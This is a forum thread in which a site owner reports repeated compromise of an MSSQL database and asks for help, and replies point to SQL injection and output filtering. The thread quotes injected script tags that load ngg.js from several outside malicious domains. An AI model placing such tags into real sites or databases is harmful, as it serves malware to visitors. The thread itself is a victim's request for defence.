How to prevent hacking the databas by entering javascript

K

kjomyjose

New member
Joined
Jul 18, 2008
Messages
1
Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script>

I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virous.

I spoke to my hosting company, they are saying they are not providing any security for hacking.

Anybody can tell how can I prevent this.

Thanks
 
kjomyjose said:
Four times my MSSQL Server hacked. Somebody inserts most of the tables text, varchar fields with its value adding at the end with<script src=http://www.pyttco.com/ngg.js></script>

I changed my ftp usernamd and password, database username and password. Still they are able to insert different scripts like

<script src=http://www.cdport.eu/ngg.js></script>
<script src=http://www.drvadw.com/ngg.js></script>
<script src=http://www.bnrc.ru/ngg.js></script>

This is a virous.

I spoke to my hosting company, they are saying they are not providing any security for hacking.

Anybody can tell how can I prevent this.

Thanks
Click to expand...
That's SQL injection and further-more not filtering your output. Changing passwords won't help against that. It's a security hole in your coding. What script are you using that deals with those tables?
 
Last edited:
kjomyjose said:
Four times my MSSQL Server hacked.
Click to expand...

Do you mean MySQL?

If it's MSSQL go on with MySQL and linux :)
If you own the server try to install mod_security for apache
If you have forms like newsletter try to check with php functions
like stripslashes, htmlentities, eregi and some if else.
 
kjomyjose said:
Four times my MSSQL Server hacked.
Click to expand...
Are you asking about the Microsoft product MSSQL, or the open source product MySQL?

If the Microsoft product, then you won't really get too much help here; this is a forum for owners/users of the DirectAdmin control panel, running on Linux and on FreeBSD. I doubt too many of us have any strong experience in MSSQL, and even if we did, this would be the wrong place for the discussion.

Jeff
 
You must log in or register to reply here.
Back
Top